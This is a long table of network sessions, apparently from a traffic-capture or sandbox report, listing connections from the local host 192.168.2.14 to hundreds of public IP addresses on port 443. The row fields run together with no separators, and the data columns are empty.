                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16749192.168.2.1459236115.209.102.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16750192.168.2.143395458.181.236.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16751192.168.2.1445344163.243.219.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16752192.168.2.1444740219.197.133.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16753192.168.2.144394614.186.32.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16754192.168.2.1437034213.252.49.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16755192.168.2.1437504209.61.162.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16756192.168.2.1453992220.134.71.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16757192.168.2.144187675.235.140.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16758192.168.2.144775617.6.177.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16759192.168.2.1444802169.27.138.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16760192.168.2.145151881.143.179.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16761192.168.2.144612857.115.147.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16762192.168.2.145171884.70.207.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16763192.168.2.143283876.26.92.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16764192.168.2.1437600211.197.215.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16765192.168.2.143685043.72.194.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16766192.168.2.1441972145.77.84.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16767192.168.2.1452664198.59.83.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16768192.168.2.143397898.41.2.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16769192.168.2.1438346164.34.219.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16770192.168.2.14333121.226.123.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16771192.168.2.144694664.65.196.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16772192.168.2.1457000135.176.180.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16773192.168.2.1433336110.99.171.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16774192.168.2.1453608160.157.150.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16775192.168.2.1456030100.173.49.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16776192.168.2.14381802.223.102.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16777192.168.2.1446838222.233.195.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16778192.168.2.1460666193.18.204.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16779192.168.2.143516890.212.139.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16780192.168.2.1458660106.127.97.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16781192.168.2.1448548167.151.192.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16782192.168.2.144951813.44.196.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16783192.168.2.1436532109.240.174.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16784192.168.2.145787212.4.149.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16785192.168.2.1454332130.162.169.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16786192.168.2.144452081.3.128.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16787192.168.2.144137849.27.178.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16788192.168.2.1442006209.113.192.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16789192.168.2.1450690156.32.50.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16790192.168.2.1439974194.227.255.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16791192.168.2.1454630216.95.239.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16792192.168.2.1455134201.23.61.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16793192.168.2.145967088.57.28.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16794192.168.2.143859079.181.137.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16795192.168.2.1450232201.8.247.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16796192.168.2.1439946133.131.33.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16797192.168.2.1436078161.11.163.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16798192.168.2.143909620.160.17.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16799192.168.2.145900414.86.119.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16800192.168.2.1439856126.188.18.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16801192.168.2.1458694125.199.86.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16802192.168.2.1449886129.77.77.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16803192.168.2.1454784204.36.251.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16804192.168.2.1439006202.207.196.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16805192.168.2.144372839.79.50.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16806192.168.2.144992043.13.10.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16807192.168.2.145843020.79.36.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16808192.168.2.1440312110.149.55.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16809192.168.2.143919444.158.145.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16810192.168.2.145364644.6.227.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16811192.168.2.1444618203.89.1.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16812192.168.2.1458196103.14.23.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16813192.168.2.144328832.53.111.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16814192.168.2.1458652144.78.128.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16815192.168.2.1442606111.107.133.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16816192.168.2.143300679.222.75.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16817192.168.2.1439660192.218.241.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16818192.168.2.143952687.113.52.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16819192.168.2.1449594166.4.218.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16820192.168.2.14390964.108.176.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16821192.168.2.143587692.211.111.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16822192.168.2.144291667.244.8.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16823192.168.2.1451228203.243.192.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16824192.168.2.143568038.61.60.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16825192.168.2.144823824.18.155.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16826192.168.2.144445850.174.177.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16827192.168.2.144583848.78.45.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16828192.168.2.1460170149.11.127.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16829192.168.2.1454794141.61.15.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16830192.168.2.1434386177.4.241.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16831192.168.2.1452340122.253.45.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16832192.168.2.1458634198.112.202.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16833192.168.2.143303263.98.213.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16834192.168.2.1435276169.93.142.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16835192.168.2.1439144114.23.75.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16836192.168.2.1435322212.4.56.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16837192.168.2.1434962154.109.246.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16838192.168.2.1448600199.4.25.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16839192.168.2.14434505.214.82.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16840192.168.2.143427218.72.147.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16841192.168.2.1436788169.107.232.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16842192.168.2.143355695.119.173.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16843192.168.2.1437762151.118.170.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16844192.168.2.143755659.29.110.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16845192.168.2.1434750140.164.99.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16846192.168.2.1434884120.176.120.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16847192.168.2.1437078165.197.42.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16848192.168.2.1454468108.68.94.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16849192.168.2.145785890.199.145.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16850192.168.2.144768642.11.193.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16851192.168.2.1453330211.172.239.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16852192.168.2.143514431.13.89.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16853192.168.2.144335417.41.140.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16854192.168.2.1436296109.98.249.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16855192.168.2.1438070117.189.22.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16856192.168.2.145050493.228.174.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16857192.168.2.145375281.70.246.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16858192.168.2.1438284175.126.43.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16859192.168.2.1437106143.230.39.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16860192.168.2.1434160178.170.56.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16861192.168.2.144869440.101.22.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16862192.168.2.144000420.3.210.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16863192.168.2.1457276181.231.189.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16864192.168.2.1442200166.240.225.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16865192.168.2.145192881.214.17.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16866192.168.2.1433704119.163.220.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16867192.168.2.143444657.10.149.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16868192.168.2.1439272122.54.11.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16869192.168.2.145110636.184.193.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16870192.168.2.144115885.211.88.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16871192.168.2.143833676.6.167.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16872192.168.2.1437692110.174.76.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16873192.168.2.144258887.151.59.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16874192.168.2.1433362203.31.227.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16875192.168.2.1438270154.250.119.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16876192.168.2.144786857.88.121.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16877192.168.2.1443578212.211.223.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16878192.168.2.1455028166.176.155.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16879192.168.2.1435718196.185.96.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16880192.168.2.1439972132.113.3.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16881192.168.2.144774427.30.254.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16882192.168.2.143593258.94.29.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16883192.168.2.145729013.15.243.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16884192.168.2.1434140128.238.91.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16885192.168.2.143440032.161.5.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16886192.168.2.145299035.250.97.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16887192.168.2.145137427.197.108.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16888192.168.2.145689278.191.188.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16889192.168.2.1456032145.2.13.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16890192.168.2.1438994116.157.15.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16891192.168.2.1444888132.251.45.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16892192.168.2.143935013.237.173.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16893192.168.2.1459108191.145.103.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16894192.168.2.145935840.76.196.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16895192.168.2.1437456132.164.176.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16896192.168.2.143622638.35.73.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16897192.168.2.145524298.183.236.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16898192.168.2.144931417.247.49.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16899192.168.2.145698296.165.162.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16900192.168.2.144256623.229.6.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16901192.168.2.1441054171.6.31.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16902192.168.2.14445889.63.9.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16903192.168.2.1441020195.213.201.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16904192.168.2.1442820149.90.121.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16905192.168.2.1458600158.175.13.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16906192.168.2.1450224173.223.21.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16907192.168.2.1452052155.120.214.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16908192.168.2.1432770136.205.161.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16909192.168.2.145082884.15.84.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16910192.168.2.1456958125.122.220.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16911192.168.2.1455360170.110.198.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16912192.168.2.1442094137.231.147.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16913192.168.2.1445344153.60.96.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16914192.168.2.1458540106.234.171.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16915192.168.2.1444182131.161.47.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16916192.168.2.145426859.108.102.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16917192.168.2.145844053.228.243.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16918192.168.2.145450893.231.206.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16919192.168.2.14579188.201.213.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16920192.168.2.145920214.126.147.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16921192.168.2.145669412.120.84.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16922192.168.2.1445964144.20.233.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16923192.168.2.1451300167.118.67.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16924192.168.2.1460166113.6.143.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16925192.168.2.143701072.102.156.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16926192.168.2.1459682150.150.216.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16927192.168.2.145832470.80.197.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16928192.168.2.143534648.200.31.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16929192.168.2.145589231.181.24.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16930192.168.2.144085820.189.98.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16931192.168.2.144408037.37.11.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16932192.168.2.145270458.231.67.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16933192.168.2.1458766158.120.44.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16934192.168.2.1448296132.178.78.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16935192.168.2.1456244144.40.139.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16936192.168.2.1456414216.224.115.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16937192.168.2.144215827.175.223.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16938192.168.2.1458908119.241.31.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16939192.168.2.1445626161.246.177.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16940192.168.2.1460734179.82.181.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16941192.168.2.1450270206.20.237.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16942192.168.2.1443378197.140.169.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16943192.168.2.1440598207.92.15.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16944192.168.2.145373666.10.51.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16945192.168.2.144991088.234.189.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16946192.168.2.145130882.31.119.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16947192.168.2.143478473.119.9.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16948192.168.2.143527281.199.150.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16949192.168.2.143829041.84.21.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16950192.168.2.145347696.226.4.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16951192.168.2.1434082119.39.124.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16952192.168.2.1454176108.148.164.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16953192.168.2.1450112112.188.193.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16954192.168.2.1454248114.96.98.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16955192.168.2.1438098211.133.69.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16956192.168.2.144650850.205.160.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16957192.168.2.143719271.177.16.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16958192.168.2.1439388118.24.167.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16959192.168.2.1433650182.41.35.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16960192.168.2.143817032.92.239.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16961192.168.2.1444368191.48.39.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16962192.168.2.1435842199.243.217.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16963192.168.2.1446384221.39.65.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16964192.168.2.1442032163.114.73.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16965192.168.2.1448570170.139.90.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16966192.168.2.1452258145.161.61.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16967192.168.2.144882269.194.242.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16968192.168.2.14536529.133.246.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16969192.168.2.1445968103.170.92.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16970192.168.2.144411840.12.158.93443
